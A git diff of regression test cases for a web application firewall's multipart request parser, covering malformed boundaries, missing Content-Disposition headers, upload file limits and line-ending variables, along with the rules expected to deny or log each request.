+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403,
+ "debug_log": "Invalid boundary in C-T \\(characters\\)"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (quoted boundary value - two quoted values)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data;boundary=\"00\"\"00\"",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--00\"00\r",
+ "Content-Disposition: form-data; name=\"name\"\r",
+ "\r",
+ "Brian Rectanus\r",
+ "--00\"00\r",
+ "Content-Disposition: form-data; name=\"email\"\r",
+ "\r",
+ "brian.rectanus@breach.com\r",
+ "--00\"00\r",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
+ "Content-Type: image/jpeg\r",
+ "\r",
+ "BINARYDATA\r",
+ "--00\"00--\r"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403,
+ "debug_log": "Invalid boundary in C-T \\(characters\\)"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (partial quoted boundary value - only start quote)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data;boundary=\"0000",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"name\"\r",
+ "\r",
+ "Brian Rectanus\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"email\"\r",
+ "\r",
+ "brian.rectanus@breach.com\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
+ "Content-Type: image/jpeg\r",
+ "\r",
+ "BINARYDATA\r",
+ "--0000--\r"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403,
+ "debug_log": "Invalid boundary in C-T \\(quote\\)"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (partial quoted boundary value - only end quote)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data;boundary=0000\"",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"name\"\r",
+ "\r",
+ "Brian Rectanus\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"email\"\r",
+ "\r",
+ "brian.rectanus@breach.com\r",
+ "--0000\r",
+ "Content-Disposition: form-data; name=\"image\"; filename=\"image.jpg\"\r",
+ "Content-Type: image/jpeg\r",
+ "\r",
+ "BINARYDATA\r",
+ "--0000--\r"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403,
+ "debug_log": "Invalid boundary in C-T \\(quote\\)"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (multipart mixed - normal)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=0000",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"name\"\r\n",
+ "\r\n",
+ "Brian Rectanus\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"email\"\r\n",
+ "\r\n",
+ "brian.rectanus@breach.com\r\n",
+ "--0000\r\n",
+ "Content-Disposition: attachment\r\n",
+ "Content-Type: multipart/mixed; boundary=BbC04y\r\n",
+ "\r\n",
+ "--BbC04y\r\n",
+ "Content-Disposition: file; filename=\"file1.txt\"\r\n",
+ "Content-Type: text/plain\r\n",
+ "\r\n",
+ "... contents of file1.txt ...\r\n",
+ "--BbC04y\r\n",
+ "Content-Disposition: file; filename=\"file2.gif\r\n",
+ "Content-Type: image/jpeg\r\n",
+ "Content-Transfer-Encoding: binary\r\n",
+ "\r\n",
+ "...contents of file2.gif...\r\n",
+ "--0000--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403,
+ "debug_log": "Invalid Content-Disposition header"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (multipart mixed - missing disposition)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=0000",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"name\"\r\n",
+ "\r\n",
+ "Brian Rectanus\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"email\"\r\n",
+ "\r\n",
+ "brian.rectanus@breach.com\r\n",
+ "--0000\r\n",
+ "Content-Type: multipart/mixed; boundary=BbC04y\r\n",
+ "\r\n",
+ "--BbC04y\r\n",
+ "Content-Disposition: file; filename=\"file1.txt\"\r\n",
+ "Content-Type: text/plain\r\n",
+ "\r\n",
+ "... contents of file1.txt ...\r\n",
+ "--BbC04y\r\n",
+ "Content-Disposition: file; filename=\"file2.gif\r\n",
+ "Content-Type: image/jpeg\r\n",
+ "Content-Transfer-Encoding: binary\r\n",
+ "\r\n",
+ "...contents of file2.gif...\r\n",
+ "--0000--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "http_code": 403,
+ "debug_log": "Part missing Content-Disposition header"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"",
+ "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"",
+ "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"multipart parser (normal)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=0000",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"name\"\r\n",
+ "\r\n",
+ "Brian Rectanus\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"email\"\r\n",
+ "\r\n",
+ "brian.rectanus@breach.com\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"image1\"; filename=\"image1.jpg\"\r\n",
+ "Content-Type: image/jpeg\r\n",
+ "\r\n",
+ "BINARYDATA1\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"image2\"; filename=\"image2.jpg\"\r\n",
+ "Content-Type: image/jpeg\r\n",
+ "\r\n",
+ "BINARYDATA2\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"image3\"; filename=\"image3.jpg\"\r\n",
+ "Content-Type: image/jpeg\r\n",
+ "\r\n",
+ "BINARYDATA3\r\n",
+ "--0000\r\n",
+ "Content-Disposition: form-data; name=\"test\"\r\n",
+ "\r\n",
+ "This is test data.\r\n",
+ "--0000--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ] + }, + "expected":{ + "http_code": 403, + "debug_log": "Upload file limit exceeded" + }, + "rules":[ + "SecRuleEngine On", + "SecUploadKeepFiles On", + "SecUploadDir /tmp", + "SecUploadFileLimit 2", + "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500161\"", + "SecRule MULTIPART_FILE_LIMIT_EXCEEDED \"!@eq 1\" \"phase:2,deny,id:500162\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500163\"", + "SecRule &FILES \"!@eq 3\" \"phase:2,deny,id:500164\"", + "SecRule &FILES_NAMES \"!@eq 3\" \"phase:2,deny,id:500165\"", + "SecRule &FILES_SIZES \"!@eq 3\" \"phase:2,deny,id:500166\"", + "SecRule FILES_SIZES:/^image/ \"@eq 0\" \"phase:2,deny,id:500167\"", + "SecRule &FILES_TMPNAMES \"!@eq 2\" \"phase:2,deny,id:500168\"" + ] }, { "enabled":1, diff --git a/test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json b/test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json index 95e8bd4eb9..3d23407596 100644 --- a/test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json +++ b/test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json 
@@ -1,121 +1,121 @@
-[
- {
- "enabled":1,
- "version_min":300000,
- "title":"Testing Variables :: FILES (1/1)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "----------------------------756b6d74fa1a8ee2\n",
- "Content-Disposition: form-data; name=\"name\"\n",
- "\n",
- "test\n",
- "----------------------------756b6d74fa1a8ee2\n",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
- "Content-Type: text/plain\n",
- "\n",
- "This is a very small test file..\n",
- "----------------------------756b6d74fa1a8ee2\n",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
- "Content-Type: text/plain\n",
- "\n",
- "This is another very small test file..\n",
- "----------------------------756b6d74fa1a8ee2--\n"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "debug_log":"Target value: \"0\" \\(Variable: MULTIPART_CRLF_LF_LINES\\)"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_CRLF_LF_LINES \"@contains 0\" \"id:1,phase:3,pass,t:trim\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"Testing Variables :: FILES (1/1)",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "----------------------------756b6d74fa1a8ee2\n",
- "Content-Disposition: form-data; name=\"name\"\n",
- "\n",
- "test\n",
- "----------------------------756b6d74fa1a8ee2\n",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
- "Content-Type: text/plain\n",
- "\n",
- "This is a very small test file..\n",
- "----------------------------756b6d74fa1a8ee2\n",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\r\n",
- "Content-Type: text/plain\r\n",
- "\r\n",
- "This is another very small test file..\r\n",
- "----------------------------756b6d74fa1a8ee2--\r\n"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "debug_log":"Target value: \"1\" \\(Variable: MULTIPART_CRLF_LF_LINES\\)"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_CRLF_LF_LINES \"@contains 0\" \"id:1,phase:3,pass,t:trim\""
- ]
- }
-]
-
+[
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"Testing Variables :: FILES (1/1)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name\"\n",
+ "\n",
+ "test\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is a very small test file..\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is another very small test file..\n",
+ "----------------------------756b6d74fa1a8ee2--\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"Target value: \"0\" \\(Variable: MULTIPART_CRLF_LF_LINES\\)"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_CRLF_LF_LINES \"@contains 0\" \"id:1,phase:3,pass,t:trim\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"Testing Variables :: FILES (1/1)",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name\"\n",
+ "\n",
+ "test\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is a very small test file..\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\r\n",
+ "Content-Type: text/plain\r\n",
+ "\r\n",
+ "This is another very small test file..\r\n",
+ "----------------------------756b6d74fa1a8ee2--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"Target value: \"1\" \\(Variable: MULTIPART_CRLF_LF_LINES\\)"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_CRLF_LF_LINES \"@contains 0\" \"id:1,phase:3,pass,t:trim\""
+ ]
+ }
+]
+
diff --git a/test/test-cases/regression/variable-MULTIPART_FILENAME.json b/test/test-cases/regression/variable-MULTIPART_FILENAME.json
index 1e83a7d849..95511e0a13 100644
--- a/test/test-cases/regression/variable-MULTIPART_FILENAME.json
+++ b/test/test-cases/regression/variable-MULTIPART_FILENAME.json
@@ -1,121 +1,121 @@
-[
- {
- "enabled":1,
- "version_min":300000,
- "title":"Testing Variables :: MULTIPART_FILENAME",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "----------------------------756b6d74fa1a8ee2\n",
- "Content-Disposition: form-data; name=\"name\"\n",
- "\n",
- "test\n",
- "----------------------------756b6d74fa1a8ee2\n",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
- "Content-Type: text/plain\n",
- "\n",
- "This is a very small test file..\n",
- "----------------------------756b6d74fa1a8ee2\n",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
- "Content-Type: text/plain\n",
- "\n",
- "This is another very small test file..\n",
- "----------------------------756b6d74fa1a8ee2--\n"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "debug_log":"Target value: \"small_text_file.txt\" \\(Variable: MULTIPART_FILENAME"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:3,pass,t:trim\""
- ]
- },
- {
- "enabled":1,
- "version_min":300000,
- "title":"Testing Variables :: MULTIPART_FILENAME",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "----------------------------756b6d74fa1a8ee2\n",
- "Content-Disposition: form-data; name=\"name\"\n",
- "\n",
- "test\n",
- "----------------------------756b6d74fa1a8ee2\n",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
- "Content-Type: text/plain\n",
- "\n",
- "This is a very small test file..\n",
- "----------------------------756b6d74fa1a8ee2\n",
- "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"\r\n",
- "Content-Type: text/plain\r\n",
- "\r\n",
- "This is another very small test file..\r\n",
- "----------------------------756b6d74fa1a8ee2--\r\n"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "debug_log":"Target value: \"small_text_file2.txt\" \\(Variable: MULTIPART_FILENAME"
- },
- "rules":[
- "SecRuleEngine On",
- "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:3,pass,t:trim\""
- ]
- }
-]
-
+[
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"Testing Variables :: MULTIPART_FILENAME",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name\"\n",
+ "\n",
+ "test\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is a very small test file..\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is another very small test file..\n",
+ "----------------------------756b6d74fa1a8ee2--\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"Target value: \"small_text_file.txt\" \\(Variable: MULTIPART_FILENAME"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:3,pass,t:trim\""
+ ]
+ },
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"Testing Variables :: MULTIPART_FILENAME",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"name\"\n",
+ "\n",
+ "test\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n",
+ "Content-Type: text/plain\n",
+ "\n",
+ "This is a very small test file..\n",
+ "----------------------------756b6d74fa1a8ee2\n",
+ "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"\r\n",
+ "Content-Type: text/plain\r\n",
+ "\r\n",
+ "This is another very small test file..\r\n",
+ "----------------------------756b6d74fa1a8ee2--\r\n"
+ ]
+ },
+ "response":{
+ "headers":{
+ "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
+ "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
+ "Content-Type":"text/html"
+ },
+ "body":[
+ "no need."
+ ]
+ },
+ "expected":{
+ "debug_log":"Target value: \"small_text_file2.txt\" \\(Variable: MULTIPART_FILENAME"
+ },
+ "rules":[
+ "SecRuleEngine On",
+ "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:3,pass,t:trim\""
+ ]
+ }
+]
+
diff --git a/test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json b/test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json
index dd196a41cb..01424f2c19 100644
--- a/test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json
+++ b/test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json
@@ -1,61 +1,61 @@
-[
- {
- "enabled":1,
- "version_min":300000,
- "title":"Testing Variables :: MULTIPART_INVALID_HEADER_FOLDING",
- "client":{
- "ip":"200.249.12.31",
- "port":123
- },
- "server":{
- "ip":"200.249.12.31",
- "port":80
- },
- "request":{
- "headers":{
- "Host":"localhost",
- "User-Agent":"curl/7.38.0",
- "Accept":"*/*",
- "Content-Length":"330",
- "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646",
- "Expect":"100-continue"
- },
- "uri":"/",
- "method":"POST",
- "body":[
- "-------------------------------69343412719991675451336310646\n",
- "Content-Disposition: form-data;\n",
- " name=\"a\"\n",
- "\n",
- "1\n",
- "-------------------------------69343412719991675451336310646\n",
- "Content-Disposition: form-data;\n",
- " name=\"b\"\n",
- "\n",
- "2\n",
- "-------------------------------69343412719991675451336310646--\n"
- ]
- },
- "response":{
- "headers":{
- "Date":"Mon, 13 Jul 2015 20:02:41 GMT",
- "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT",
- "Content-Type":"text/html"
- },
- "body":[
- "no need."
- ]
- },
- "expected":{
- "debug_log":"ARGS:a"
- },
- "rules":[
- "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"",
- "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"",
- "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 0\" \"phase:2,deny,status:403,id:500076\"",
- "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"",
- "SecRule ARGS \"@eq 1\" \"phase:2,deny,status:403,id:5000277\""
- ]
- }
-]
-
+[
+ {
+ "enabled":1,
+ "version_min":300000,
+ "title":"Testing Variables :: MULTIPART_INVALID_HEADER_FOLDING",
+ "client":{
+ "ip":"200.249.12.31",
+ "port":123
+ },
+ "server":{
+ "ip":"200.249.12.31",
+ "port":80
+ },
+ "request":{
+ "headers":{
+ "Host":"localhost",
+ "User-Agent":"curl/7.38.0",
+ "Accept":"*/*",
+ "Content-Length":"330",
+ "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646",
+ "Expect":"100-continue"
+ },
+ "uri":"/",
+ "method":"POST",
+ "body":[
+ "-------------------------------69343412719991675451336310646\n",
+ "Content-Disposition: form-data;\n",
+ " name=\"a\"\n",
+ "\n",
+ "1\n",
+ "-------------------------------69343412719991675451336310646\n",
+ "Content-Disposition: form-data;\n",
